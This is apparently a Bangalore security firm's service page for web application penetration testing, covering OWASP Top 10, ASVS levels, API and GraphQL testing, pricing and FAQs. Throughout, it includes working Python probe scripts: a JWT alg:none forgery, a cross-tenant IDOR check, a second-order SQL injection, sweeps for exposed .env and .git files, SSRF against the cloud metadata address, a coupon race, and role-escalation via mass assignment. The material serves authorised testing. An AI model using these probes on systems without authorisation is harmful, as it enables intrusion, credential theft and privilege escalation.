Web Application Security Testing Services in Bangalore

Manual-led, tool-augmented web application penetration testing from Bengaluru. OWASP ASVS L1–L3, OWASP API Top 10, GraphQL test plans, business-logic and IDOR testing. Findings filed straight into your Jira / Linear with severity, CVSS, and a suggested remediation owner.

Timeline
2–4 weeks
From (INR)
₹1,80,000
Delivered from
Bengaluru
Empanelment
CERT-In
web application security testing Bangalore · OWASP ASVS audit India · web pentest Bengaluru · GraphQL security testing · API security testing OWASP API Top 10 · business logic flaw testing

Application-layer attacks need application-layer auditors. The cheap end of the Bangalore VAPT market — which prices a full engagement at ₹40,000–₹80,000 — runs Nessus or Acunetix against your application, formats the output into a 30-page PDF, and calls it a web application security audit. The output catches outdated jQuery libraries and missing security headers; it misses every business-logic flaw, every IDOR, every authorisation bypass, every authentication edge case, and every integration-seam issue between your application and its dependencies. Those are the findings that actually matter — the ones a determined attacker exploits and the ones your enterprise buyer’s security review asks about. This page describes the methodology our application-security specialists use to find them.

Why web application testing is different

Network VAPT and web application testing share the word "VAPT" but are different disciplines. Network VAPT examines the infrastructure plane — services, ports, protocols, configurations — and is largely tool-driven (Nessus, Nmap, Nuclei). Web application testing examines the application plane — the business logic implemented by the code your engineers wrote — and is largely manual. The skill set is different (a senior network engineer is rarely a senior application-security engineer and vice versa), the toolchain is different (Burp Suite Pro is the canonical web-app tool, equivalent to Nessus for the network world), and crucially the findings are different. The same client running a network VAPT and a web application test will receive two reports with almost no overlap.

The bulk of the value in a web application engagement comes from manual analysis. Automated tools find about 25% of real issues (typically the obvious ones — outdated dependencies, missing headers, basic XSS). The remaining 75% — and 100% of the highest-impact findings — come from an engineer who reads your sequence diagrams, runs your authentication flow under a debugger, traces your authorisation checks across endpoints, and identifies the moments where intent and implementation diverge.

Who in Bangalore needs this

Most Bangalore B2B SaaS companies need a serious web application engagement at least annually. The drivers vary by buyer mix:

SaaS companies pursuing SOC 2 / ISO 27001

Both frameworks require evidence of application-security testing, and generic network VAPT does not cover the application layer adequately for either auditor. Roughly half of our SOC 2 and ISO 27001 clients bundle a web application engagement into the same audit cycle; the bundling is detailed on our SOC 2 service page.

Fintech and BFSI vendors

RBI and SEBI require quarterly application-security testing for digital channels and customer-facing apps. Pure network VAPT does not satisfy the regulators’ expectation of "comprehensive penetration testing"; application-layer testing is now table stakes.

HealthTech and EdTech consumer products

Consumer apps handling PII or PHI need application-layer focus on data exposure, IDOR (the single highest-impact class for multi-tenant consumer apps), and authentication edge cases.

Companies after a public security incident

If your application has been the target of a credential-stuffing attack, a data-exposure event, or any other application-layer incident, the post-incident audit needs to be application-layer too. We have run dozens of post-incident engagements in Bangalore; the typical finding is that the original attack vector sits alongside two or three additional unexploited issues that would have been the attacker's next step.

OWASP Top 10 (2021) — what we test

The OWASP Top 10 is the most-referenced application security awareness document, currently in its 2021 revision (the 2025 revision is in draft as of this page’s last edit). Each category in the Top 10 maps to a specific test plan in our engagement.

A01 · Broken Access Control

The largest and most-impactful category. We test for IDOR (Insecure Direct Object Reference) across tenancy boundaries — can user A access user B’s data by changing an ID in the URL, request body, or JWT claim — vertical privilege escalation (free-tier accessing paid features), horizontal privilege escalation (admin functions accessible by non-admins), forced browsing, mass-assignment in update APIs, and CORS misconfiguration. This is where business-logic testing pays the highest return.
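
A minimal sketch of the cross-tenant IDOR probe, assuming a hypothetical /api/invoices/{id} endpoint and two test accounts we control in different tenants:

```python
import requests

BASE = "https://staging.example.com"  # hypothetical target; always tested within an authorised scope

TOKEN_TENANT_A = "eyJ..."        # session/JWT for a test user in tenant A
INVOICE_ID_TENANT_B = 4821       # resource known to belong to tenant B

def check_idor(resource_id: int, token: str) -> None:
    """Request tenant B's resource with tenant A's credentials.
    Anything other than a 403/404 suggests a broken object-level check."""
    r = requests.get(
        f"{BASE}/api/invoices/{resource_id}",
        headers={"Authorization": f"Bearer {token}"},
        timeout=10,
    )
    if r.status_code == 200:
        print(f"[!] Possible IDOR: invoice {resource_id} readable cross-tenant")
    else:
        print(f"[ok] {r.status_code} for invoice {resource_id}")

check_idor(INVOICE_ID_TENANT_B, TOKEN_TENANT_A)
```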

A02 · Cryptographic Failures

We test TLS configuration, cipher selection, certificate validation, hashing algorithm choice (bcrypt / Argon2 / scrypt for passwords; SHA-256 minimum for non-password use; never MD5 or SHA-1), encryption at rest, key management, and JWT signing implementation (the alg:none vulnerability is still found in roughly 5% of Bangalore engagements; weak HMAC keys in roughly 15%).
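
The alg:none probe needs nothing beyond the Python standard library plus an HTTP client; the sketch below forges an unsigned token against a hypothetical /api/me endpoint. A correct verifier rejects it outright.

```python
import base64
import json
import requests

def b64url(data: bytes) -> str:
    """JWT-style base64url without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Forge an unsigned token: the header claims alg "none" and the
# signature segment is left empty.
header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"sub": "1", "role": "admin"}).encode())
forged = f"{header}.{payload}."  # trailing dot, empty signature

r = requests.get(
    "https://staging.example.com/api/me",  # hypothetical endpoint
    headers={"Authorization": f"Bearer {forged}"},
    timeout=10,
)
print("[!] alg:none accepted" if r.status_code == 200 else f"[ok] rejected ({r.status_code})")
```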

A03 · Injection

SQL injection, NoSQL injection, command injection, LDAP injection, OS command injection, server-side template injection (SSTI), and XML external entity (XXE) injection. Modern frameworks have largely eliminated trivial SQLi but second-order injection — where data passes through a sanitiser, gets stored, and is re-used in a context where the sanitisation does not apply — is still common.
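
Second-order injection in miniature (illustrative only; the sanitiser, schema, and query are all hypothetical): the value is escaped for the HTML context at input time, stored safely with a parameterised INSERT, then re-read and interpolated into SQL by a different code path where the HTML escaping is irrelevant.

```python
import html
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, display_name TEXT)")

# Input time: the value is sanitised for the HTML context (XSS) and
# stored with a parameterised INSERT. Nothing looks wrong yet.
attacker_name = "x' OR '1'='1"
conn.execute(
    "INSERT INTO users VALUES (?, ?)",
    (1, html.escape(attacker_name, quote=False)),  # escapes < > &, not quotes
)

# Later: a different code path trusts the "already sanitised" value and
# interpolates it into SQL directly. The HTML escaping does not apply
# to this context, so the injection survives storage.
stored = conn.execute("SELECT display_name FROM users WHERE id = 1").fetchone()[0]
rows = conn.execute(
    f"SELECT * FROM users WHERE display_name = '{stored}'"  # second-order SQLi
).fetchall()
print(f"{len(rows)} row(s) returned: the OR '1'='1' clause matched everything")
```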

A04 · Insecure Design

Architectural-level issues: lack of rate limiting, missing authorisation in microservice-to-microservice calls, optimistic-concurrency race conditions, time-of-check / time-of-use vulnerabilities, missing audit logging, business-logic flaws (this category overlaps heavily with our dedicated business-logic test plan).

A05 · Security Misconfiguration

Default credentials, verbose error messages, exposed admin panels, exposed cloud storage, insecure HTTP headers, debug mode enabled in production, exposed git directories, exposed backup files, exposed .env files. Catches an embarrassing number of issues in every engagement.
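
The exposed-artifact sweep is trivial to script; a sketch against a hypothetical origin (any hit is triaged manually before it is reported):

```python
import requests

BASE = "https://staging.example.com"  # hypothetical target

# Paths that should never resolve on a production origin.
ARTIFACTS = [
    "/.env", "/.git/config", "/.git/HEAD",
    "/backup.sql", "/config.php.bak",
    "/admin/", "/debug", "/phpinfo.php",
]

for path in ARTIFACTS:
    r = requests.get(BASE + path, timeout=10, allow_redirects=False)
    # A 200 with plausible content (e.g. "[core]" in .git/config)
    # becomes a candidate finding; anything else is noise.
    if r.status_code == 200:
        print(f"[!] {path} -> 200 ({len(r.content)} bytes)")
```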

A06 · Vulnerable and Outdated Components

Dependency-chain analysis. We scan your package.json / requirements.txt / pom.xml / composer.json / Gemfile against the Snyk and OSV databases, identify direct and transitive vulnerabilities, and flag outdated runtime versions (Node, Python, PHP, Java, Ruby).
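
OSV exposes a public query API, so a single pinned dependency can be checked with one POST. A sketch, using a lodash release with well-documented advisories:

```python
import requests

def osv_lookup(name: str, version: str, ecosystem: str = "npm") -> list:
    """Query the public OSV database for known vulnerabilities
    affecting one pinned dependency."""
    r = requests.post(
        "https://api.osv.dev/v1/query",
        json={"version": version, "package": {"name": name, "ecosystem": ecosystem}},
        timeout=15,
    )
    r.raise_for_status()
    return r.json().get("vulns", [])

for vuln in osv_lookup("lodash", "4.17.15"):
    print(vuln["id"], "-", vuln.get("summary", ""))
```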

A07 · Identification and Authentication Failures

Password policy enforcement, account-lockout behaviour, credential-stuffing resilience, session fixation, session-token entropy, multi-factor implementation, password-reset workflow, single-sign-on integration security.

A08 · Software and Data Integrity Failures

Insecure deserialisation, untrusted CI/CD pipeline configuration, missing integrity verification on auto-update flows, mutable container tags in production.

A09 · Security Logging and Monitoring Failures

Missing audit logging on security-relevant events, log injection vulnerabilities, log-tampering protection, log-retention policy validation. Often a report finding rather than a directly exploitable issue, but graded nonetheless because it affects post-incident forensics.

A10 · Server-Side Request Forgery (SSRF)

URL-fetch features, webhook validators, image proxies, RSS importers, OAuth-callback validation. SSRF is one of the highest-impact findings in cloud-native apps because it provides a path to AWS / Azure / GCP metadata services and from there to credentials.
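
A sketch of the SSRF probe against a hypothetical URL-fetch feature. The candidate list leads with the cloud metadata address because that is the highest-impact pivot:

```python
import requests

FETCH_ENDPOINT = "https://staging.example.com/api/fetch-preview"  # hypothetical URL-fetch feature

# Internal targets an SSRF typically reaches; 169.254.169.254 is the
# AWS / Azure / GCP instance-metadata address.
CANDIDATES = [
    "http://169.254.169.254/latest/meta-data/",
    "http://localhost:6379/",   # Redis
    "http://10.0.0.1/",         # internal gateway
    "http://[::1]:80/",         # IPv6 loopback, slips past naive IPv4 filters
]

for target in CANDIDATES:
    r = requests.post(FETCH_ENDPOINT, json={"url": target}, timeout=15)
    # Any response that echoes internal content back indicates SSRF;
    # body length and status are compared against a known external URL.
    print(target, "->", r.status_code, len(r.content), "bytes")
```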

OWASP ASVS L1, L2, L3

The OWASP Application Security Verification Standard (ASVS) is a more comprehensive control catalogue than the Top 10 — currently in version 4.0.3 with v5.0 in late draft. ASVS organises 286 controls across 14 chapters and three verification levels.

Level 1 — Opportunistic

The minimum bar for any internet-facing application. Defends against opportunistic attackers using widely-available tools. Our default scope when the engagement is buyer-driven and no specific level is mandated.

Level 2 — Standard

Applications handling sensitive data — most B2B SaaS, all fintech, all healthtech, any consumer app at scale. Our most-common engagement level. ~250 controls verified.

Level 3 — Advanced

Applications protecting high-value or critical-impact data — banking core systems, healthcare clinical decision support, critical infrastructure, life-safety. Engagement is roughly 50% larger than L2 and pricing scales accordingly.

Business-logic testing — the actual differentiator

Business-logic testing is what separates a useful engagement from a checklist exercise. The methodology requires reading your application’s sequence diagrams, running it through its expected and unexpected flows, and probing the moments where business rules cross technical boundaries.

Recurring patterns in Bangalore B2B SaaS:

  • Free-tier-to-paid feature bypass — the front-end hides paid features but the back-end does not enforce the entitlement check on the API endpoint
  • Workflow-state-machine skipping — order goes from "draft" to "fulfilled" without passing through "approved"
  • Race conditions on monetary operations — discount-code application, refund processing, balance updates (a parallel-request probe is sketched after this list)
  • Tenancy-boundary IDOR in B2B SaaS — user from tenant A enumerates resources of tenant B
  • Time-of-check / time-of-use on critical operations — file is verified, then re-read by the worker that processes it
  • Optimistic-concurrency exploitation — submitting two requests in parallel to bypass per-resource constraints
  • Privilege amplification via integration — Slack-bot OAuth scope grants more than the in-app role would
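
The race-condition probe referenced above, sketched against a hypothetical single-use coupon endpoint (paths, token, and coupon code are all illustrative):

```python
import concurrent.futures
import requests

BASE = "https://staging.example.com"  # hypothetical target
SESSION_TOKEN = "..."                 # a test account we control

def apply_coupon(_: int) -> int:
    """Apply the same single-use coupon; fired in parallel below."""
    r = requests.post(
        f"{BASE}/api/cart/apply-coupon",
        headers={"Authorization": f"Bearer {SESSION_TOKEN}"},
        json={"code": "WELCOME50"},
        timeout=10,
    )
    return r.status_code

# Fire 20 identical requests as close to simultaneously as possible.
# A correct implementation accepts exactly one; more than one 200
# indicates a check-then-update race on the coupon's usage counter.
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as pool:
    results = list(pool.map(apply_coupon, range(20)))

print(f"{results.count(200)} of 20 parallel applications accepted")
```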

GraphQL-specific testing

GraphQL has its own class of issues that REST does not exhibit. Our GraphQL test plan covers the items below; two of the probes are sketched in code after the list:

  • Introspection exposure — schema visible to unauthenticated users in production
  • Depth-based denial of service — deeply-nested queries that explode resolver execution
  • Aliasing-based denial of service — single requests with hundreds of aliased fields
  • Batched-query rate-limit bypass — multiple operations in one HTTP request
  • Field-suggestion-based schema discovery — error messages suggesting valid field names
  • Authorisation gap at resolver level — endpoint-level auth checks are insufficient
  • Mutation-side-effect exploitation — mutations triggering downstream effects without authorisation
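
Two of these probes, sketched against a hypothetical /graphql endpoint (the self-referencing "friends" field is illustrative; on a real engagement the nesting is built from the target's own schema):

```python
import requests

GRAPHQL = "https://staging.example.com/graphql"  # hypothetical endpoint

# 1. Introspection exposure: the full schema should not be visible to
#    unauthenticated callers in production.
introspection = "{ __schema { types { name } } }"
r = requests.post(GRAPHQL, json={"query": introspection}, timeout=15)
print("introspection:", "exposed" if "__schema" in r.text else f"blocked ({r.status_code})")

# 2. Depth-based DoS probe: build progressively deeper queries and watch
#    response time; servers without depth limiting degrade sharply.
def nested_query(depth: int) -> str:
    q = "id"
    for _ in range(depth):
        q = f"friends {{ {q} }}"
    return f"{{ viewer {{ {q} }} }}"

for depth in (5, 15, 30):
    r = requests.post(GRAPHQL, json={"query": nested_query(depth)}, timeout=30)
    print(f"depth {depth}: {r.status_code} in {r.elapsed.total_seconds():.2f}s")
```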

OWASP API Top 10 (2023)

For pure API engagements (where the front-end is not in scope, or the API is a separate product), we test against the OWASP API Top 10 (2023 edition):

  1. API1 · Broken Object Level Authorization (BOLA) — the API equivalent of IDOR, the single most-common high-impact API finding
  2. API2 · Broken Authentication
  3. API3 · Broken Object Property Level Authorization (BOPLA) — mass-assignment combined with property-level filtering gaps (probe sketched after this list)
  4. API4 · Unrestricted Resource Consumption — rate limiting, payload size, expensive operations
  5. API5 · Broken Function Level Authorization
  6. API6 · Unrestricted Access to Sensitive Business Flows
  7. API7 · Server Side Request Forgery
  8. API8 · Security Misconfiguration
  9. API9 · Improper Inventory Management — abandoned endpoints, undocumented versions, deprecated paths still serving
  10. API10 · Unsafe Consumption of APIs
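
The BOPLA probe referenced at API3, sketched against a hypothetical profile-update endpoint. The extra properties are illustrative; on a real engagement they are chosen from the target's schema:

```python
import requests

BASE = "https://staging.example.com"  # hypothetical target
TOKEN = "..."                         # ordinary (non-admin) test account

# A legitimate profile update sends only display_name. The probe adds
# properties the client never exposes and checks whether the server
# binds them anyway.
payload = {
    "display_name": "pentest",
    "role": "admin",          # vertical escalation attempt
    "email_verified": True,   # state the user should not control
    "tenant_id": 2,           # tenancy-move attempt
}
requests.patch(
    f"{BASE}/api/users/me",
    headers={"Authorization": f"Bearer {TOKEN}"},
    json=payload,
    timeout=10,
)

# Re-read the profile and diff: any of the extra properties persisting
# is a mass-assignment / BOPLA finding.
me = requests.get(
    f"{BASE}/api/users/me",
    headers={"Authorization": f"Bearer {TOKEN}"},
    timeout=10,
).json()
print({k: me.get(k) for k in ("role", "email_verified", "tenant_id")})
```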

Engagement methodology

Five phases, sequential per asset, parallelised across the engagement. Detailed in the VAPT methodology section; the application-specific specialisation is heavier on the threat-modelling and business-logic phases. Output is the same — a written report with reproduction, evidence, and remediation guidance per finding.

Pricing in INR

Tier 1 · Single app
Web App + API
₹1,80,000 + GST
  • One web application + its API
  • OWASP ASVS L1–L2
  • 2–3 week engagement
  • Two retest cycles

Tier 3 · L3 Advanced
High-Assurance Audit
₹6,80,000 + GST
  • OWASP ASVS L3 (286 controls)
  • White-box code review included
  • Architecture review session
  • 6-week engagement
  • Quarterly retainer option

Twenty common findings

  1. IDOR across tenancy boundaries (multi-tenant SaaS)
  2. Mass-assignment in user-update APIs (role escalation)
  3. JWT alg:none / weak-HMAC / missing-expiry validation
  4. Missing rate limit on authentication / password-reset / OTP endpoints
  5. Server-Side Request Forgery in URL-fetch / webhook / image-proxy
  6. Stored XSS in admin panels (a surface routinely skipped by automated scans)
  7. Reflected XSS in error pages, search, redirect parameters
  8. SQL injection in poorly-parameterised search / filter / sort
  9. NoSQL injection in MongoDB-backed search
  10. Privilege escalation via missing authorisation in microservice-to-microservice calls
  11. OAuth scope over-grant (Google / Slack / GitHub integrations)
  12. Open redirect in login / sign-up callback parameters
  13. Race condition in discount / refund / balance operations
  14. Workflow-state-machine bypass
  15. Hardcoded API keys in front-end JavaScript bundle
  16. Verbose error messages exposing stack traces / DB queries
  17. Insecure file upload (content-type bypass, path traversal)
  18. Missing CSRF protection on state-changing operations
  19. Subdomain takeover via dangling DNS
  20. Vulnerable transitive dependencies in production builds

Web application security by Bangalore industry vertical

Industry context shapes the test plan. Below is the application of our methodology to the verticals we deliver into most often.

BFSI — Banks, NBFCs, payment aggregators

BFSI web applications carry the highest threat model — well-resourced adversaries, regulatory expectation of comprehensive testing, and direct financial-transaction surface. Specific test areas: payment-flow business-logic (double-spend, replay, concurrent-transaction races), maker-checker bypass, dormant-account hijacking, fund-transfer authorisation flow, customer-impersonation paths via support-tool integration. Our BFSI engagements run quarterly per RBI expectations and produce reports designed for RBI examination submission.

Fintech and capital markets

Trading platforms, lending platforms, wealth-management platforms. Specific test areas: order-book manipulation surfaces, KYC-bypass paths, lending-eligibility circumvention, portfolio-data leakage between users, customer-data exposure via API misconfiguration. For SEBI-regulated entities, see our SEBI CSCRF page.

HealthTech — Telemedicine, diagnostics, EHR

Web applications handling PHI face DPDP sensitive-data exposure and clinical-governance expectations. Specific test areas: patient-record IDOR (the highest-impact finding class for telemedicine), prescription-tampering paths, doctor-patient-conversation-recording exposure, lab-result IDOR, role-based access between treating physician / consulting physician / billing-staff. Our HealthTech engagements add specific PHI-exposure test cases beyond standard scope.

SaaS — B2B exporters and consumer products

The largest single category. SaaS web app testing focuses on multi-tenant security: tenant-boundary IDOR, cross-tenant authorisation, tenant-context-switching attacks, customer-data isolation under shared-database architectures. Add to that the SOC 2 / ISO 27001 evidence-collection requirement and the buyer-side vendor-security review that the report feeds.

EdTech — Children’s and adult platforms

EdTech web applications serving children carry DPDP children’s-data obligations. Specific test areas: age-verification implementation, parental-consent flow integrity, prohibition on tracking and behavioural monitoring, advertising-SDK presence (which is generally prohibited in children’s contexts under DPDP), and data-minimisation enforcement.

Government and public-sector technology

Government web applications and citizen-services platforms. Our engagements here typically run under specific tender requirements and produce CERT-In compliant reports formatted for regulator submission. Specific test areas: identity-federation security with UIDAI / Digi-Locker / CSC, citizen-data IDOR, bulk-data-export prevention, document-tampering protection.

White-box vs black-box testing — when each is right

Most web application engagements default to black-box testing — we test from the perspective of an external attacker without source-code access. White-box adds source-code access; we read the code while we test, which substantially increases the finding rate and reduces the engagement timeline by 20–30%.

White-box advantages:

  • Hidden code paths surfaced (debug endpoints, admin functions not in normal UI flow)
  • Hardcoded secrets and credentials surfaced quickly
  • Dependency-chain analysis substantially deeper
  • Business-logic flaws traced through the implementation rather than inferred from behaviour
  • Race conditions identified by code-path analysis rather than fuzzing

White-box disadvantages:

  • Cost is higher (a ~30–50% premium)
  • Less representative of real-attacker discovery process
  • Some clients are unwilling to share source code with external auditors (we operate under NDA with strict access controls; most concerns are addressed by the access architecture)

Our recommendation: white-box for greenfield applications (where finding everything matters), white-box for high-risk verticals (BFSI, HealthTech), white-box for SOC 2 / ISO 27001 evidence cycles where comprehensiveness is the goal. Black-box for periodic external-perspective testing on established applications, for buyer-driven third-party-audit-acceptable testing, and for first-time engagements where the client is uncertain about source-code sharing.

API security deep-dive

APIs are now the dominant attack surface for most B2B SaaS applications. Where the front-end UI used to be the primary attack surface, the modern architecture exposes the API directly via SDKs, mobile applications, partner integrations, and public-facing developer portals. The API is now where the value lives and the controls have to live too.

The OWASP API Top 10 (2023 edition) is the canonical baseline; our methodology layers surface-specific test plans on top of it, per API style.

REST APIs

The dominant API style. Test plan covers OWASP API Top 10 plus surface-specific items: HTTP-verb tampering, content-type confusion, conditional-request abuse (If-Match / If-None-Match exploits), bulk-endpoint abuse, idempotency-key abuse.

GraphQL APIs

Detailed treatment earlier on this page. The depth-of-query, aliasing, batched-query, and field-suggestion attack surfaces are all GraphQL-specific.

gRPC APIs

Less common in Bangalore SaaS but used in service-mesh deployments. Test plan includes Protocol Buffer reflection, streaming-message abuse, gRPC-Web bridge security, deadline-propagation analysis.

SOAP / XML APIs

Legacy but still common in BFSI integrations. XXE, XML-bomb, WS-Security misconfiguration, SOAP-action manipulation are the main surfaces.

Webhook receivers

Increasingly relevant. Webhook-signature verification, replay-attack prevention, payload-validation, error-handling without information leakage.
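
What a sound receiver does, and therefore what we test for the absence of: a constant-time HMAC check over timestamp plus body, with a replay window. A standard-library sketch (the header and secret formats are hypothetical):

```python
import hashlib
import hmac
import time

SECRET = b"whsec_..."            # shared signing secret (hypothetical format)
REPLAY_WINDOW_SECONDS = 300

def verify_webhook(body: bytes, signature_hex: str, timestamp: str) -> bool:
    """Reject stale deliveries, then verify an HMAC over timestamp + body
    so the timestamp itself is tamper-proof."""
    if abs(time.time() - int(timestamp)) > REPLAY_WINDOW_SECONDS:
        return False  # replay protection
    expected = hmac.new(
        SECRET, f"{timestamp}.".encode() + body, hashlib.sha256
    ).hexdigest()
    # compare_digest avoids the timing side channel of a plain ==
    return hmac.compare_digest(expected, signature_hex)
```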

Our default API engagement targets whichever API style you run in production; multi-API estates (REST + GraphQL + webhooks, common in modern SaaS) are scoped together and tested as one integrated surface.

How a typical web app engagement runs week-by-week

  • Week 0: scoping conversation and SOW.
  • Week 1: reconnaissance and threat modelling, ending with a kickoff call where we present the threat model back to your team and confirm the testing-plan priorities.
  • Weeks 2–3: active testing. Daily standups with your security team, immediate escalation of any P0 findings; critical issues never wait for the report.
  • Week 4: report drafting and peer review by a second senior engineer; the partner overseeing the engagement signs off on the deliverable.
  • Weeks 5–6: retest cycles after your team remediates. The final retest produces a closure report stamping each finding as closed, residual, or open.

Most clients also receive a one-hour debrief call with the lead auditor where the team can ask questions about specific findings and remediation approaches; this is included in the engagement fee.

Evaluating a web app security vendor — six questions

The Bangalore web application security vendor population is uneven; the six questions below separate substantive vendors during procurement.

  1. Manual-effort percentage: what fraction of the engagement is senior-engineer manual analysis versus automated scanner output? Below 60% manual indicates a tool-output rebrand. We are 70%+ manual on every engagement.
  2. Senior-engineer ratio: how many engineers with 5+ years of application security work on the engagement, and what fraction of total engagement effort is theirs? Vendors staffing junior engineers behind a senior name are common; specific staffing transparency is the antidote.
  3. Business-logic methodology: ask for the threat-modelling approach used per engagement. Vendors that conflate business-logic testing with vulnerability scanning are missing the highest-impact finding class.
  4. White-box willingness: ask whether source-code review is offered, and at what marginal cost. Vendors declining white-box are typically less confident with codebase analysis.
  5. Retest cycles: how many retest cycles are included in the SOW? Retests sold as a separate engagement are a soft signal of a vendor expecting incomplete remediation.
  6. Findings filing: will the vendor file findings directly into your Jira / Linear / GitHub Issues, with severity, CVSS, and a suggested owner? Vendors that decline are typically delivering report-only engagements that leave your team to file the findings themselves.

We answer all six specifically and in writing during scoping.

To start a web application security engagement, the next step is a thirty-minute scoping call. Most engagements begin within five business days.

Frequently asked questions

How does a web application security test differ from a network VAPT?

A network VAPT looks for misconfigured services, exposed ports, and known-CVE vulnerabilities at the perimeter or internally. A web application security test looks for issues in the application layer — the business logic, the authentication and authorisation flows, the data flows, the integration seams between services. Different skill set, different toolchain, different findings. Most cheap "VAPT" engagements miss application-layer issues entirely because the engineer doing the work is a network specialist running a Nessus scan. Our web application engagements are run by application-security specialists who have spent years breaking SaaS products.

Which ASVS level do we need: L1, L2, or L3?

All three are available. L1 is the baseline (any internet-facing application should pass it) and the default for entry-level engagements. L2 applies to applications handling sensitive data — most B2B SaaS, all fintech, all healthtech — and is our most-common engagement scope. L3 applies to applications protecting high-value or critical data — banking core systems, military, life-safety — and is rare outside of regulated finance and government. We will recommend the appropriate level after the scoping call based on what your application handles.

What is business-logic testing?

Business-logic testing examines whether the application enforces its intended business rules as opposed to whether the application is technically secure. Examples: can a free-tier user trigger a paid-tier feature by manipulating a request parameter? Can an order-fulfilment workflow be bypassed by skipping a state-machine step? Can a discount be applied repeatedly by submitting the coupon code in parallel? These are the issues automated scanners cannot find — they require an engineer who reads your sequence diagrams and understands what your software is supposed to do. Business-logic findings are routinely the highest-impact items in our reports.

Do you test single-page applications (SPAs)?

Yes — and SPAs need different methodology than server-rendered apps. We test the JavaScript bundle for hardcoded secrets and exposed business logic, the API surface that the SPA consumes, the authentication and session-management implementation (typically JWT or session cookies with various edge cases), the client-side authorisation that the backend should not trust, and integration with third-party SDKs. Most modern Bangalore SaaS products are SPAs; this is our default mode.

Do you test GraphQL APIs?

Yes, with a separate methodology. GraphQL has a specific class of issues that REST does not: introspection exposure, depth-based DoS, query-aliasing-based DoS, batched-query rate-limit bypass, field-suggestion abuse for schema discovery, and authorisation that is enforced at the resolver level rather than the endpoint level. Our GraphQL test plan covers all of the above plus the standard OWASP API Top 10 mapped to GraphQL semantics.

Can you file findings directly into our issue tracker?

Yes. Standard engagement includes Jira / Linear / GitHub Issues integration — every finding is filed as a ticket in your tracker with severity, CVSS, reproduction steps, evidence, and a suggested remediation owner based on the file paths the issue touches. We work to your existing labelling and component conventions; you do not adapt to our format.

Do you test against staging or production?

We can test against either, with different rules of engagement. Staging is preferred because we can be more aggressive — try harder injections, longer-running checks, exploitation chains that would be visible to your other customers in production. Production testing is possible for read-only scope, with strict rate limits, blackout windows, and a coordination cadence with your on-call team. For new applications, we strongly recommend running the engagement in staging first; for existing apps where staging does not mirror production, we run a shorter production-only scope as a follow-on.

How long does an engagement take?

A single web application with associated API typically takes 2–4 weeks end-to-end: 3 days of threat-modelling and reconnaissance, 8–12 days of active testing, 3–5 days of report drafting and review, plus retest cycles. Larger applications (e-commerce platforms, multi-product SaaS suites, banking front-ends) take 6–8 weeks. We publish the timeline before kickoff.

Do you offer white-box (source-code) testing?

Yes, on request. White-box testing is roughly 30% more efficient than black-box because we can see the code paths directly and identify issues that black-box would miss (hardcoded secrets in non-public files, code-path-specific business-logic flaws, dependency-chain vulnerabilities). We require read-only Git access for the engagement duration and return your repository unchanged. White-box adds ~₹60,000–₹1,20,000 to the engagement depending on codebase size.

Do you test CMS-based applications such as WordPress?

Yes. Each CMS has its own attack surface — plugin vulnerabilities, theme injection, admin-panel exposure, REST API misconfigurations. Our engagement scope identifies the CMS and includes its specific test plan as part of the standard methodology. WordPress in particular has well-documented attack patterns we have tested for many times in Bangalore engagements.
Ready to scope this engagement?

Book a thirty-minute scoping call.

Tell us your framework, your stack and the deadline. You leave the call with a written scope, a fixed price in INR, and a kick-off invite.